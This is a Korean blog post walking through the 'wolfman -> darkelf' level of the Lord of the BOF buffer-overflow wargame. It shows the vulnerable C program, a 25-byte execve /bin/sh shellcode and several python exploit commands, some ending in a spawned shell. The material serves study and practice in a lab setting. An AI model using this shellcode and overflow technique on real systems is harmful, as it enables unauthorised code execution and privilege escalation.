ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [lob] wolfman -> darkelf
    공부/LOB 2014. 7. 30. 20:03

    [wolfman@localhost wolfman]$ cat darkelf.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - darkelf
            - egghunter + buffer hunter + check length of argv[1]
    */

    #include <stdio.h>
    #include <stdlib.h>

    extern char **environ;

    main(int argc, char *argv[])
    {
        char buffer[40];
        int i;

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
            memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
            printf("stack is still your friend.\n");
            exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
            printf("argument is too long!\n");
            exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

            // buffer hunter
            memset(buffer, 0, 40);
    }
    [wolfman@localhost wolfman]$

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

    25 byte shellcode

    ltrace ./elf `python -c'print "a"*19"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x19\xfa\xff\xbf"'

    ltrace ./elf `python -c'print "\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x19\xfa\xff\xbf"'`

    [wolfman@localhost wolfman]$ ./elf `python -c'print "a"*44+"\x45\xfc\xff\xbf"'` `python -c'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
    //argv[2] 에 쉘코드를 올리고 그 주소로 점프

    ltrace ./dark `python -c'print "a"*44+"\x0d\xfc\xff\xbf"'` `python -c'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

    [wolfman@localhost wolfman]$ ./darkelf `python -c'print "a"*44+"\x0f\xfc\xff\xbf"'` `python -c'print "\x90"*30+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?
    bash$ my-pass
    euid = 506
    kernel crashed
    bash$

    '공부 > LOB' 카테고리의 다른 글

    [lob] orge -> troll  (0) 2014.07.30
    [lob] darkelf -> orge  (0) 2014.07.30
    [lob] wolfman -> darkelf  (0) 2014.07.30
    [lob] orc -> wolfman  (0) 2014.07.30
    [lob]goblin->orc  (0) 2014.07.30
    [lob]cobolt->goblin  (0) 2014.07.30

    댓글 0

Designed by Tistory.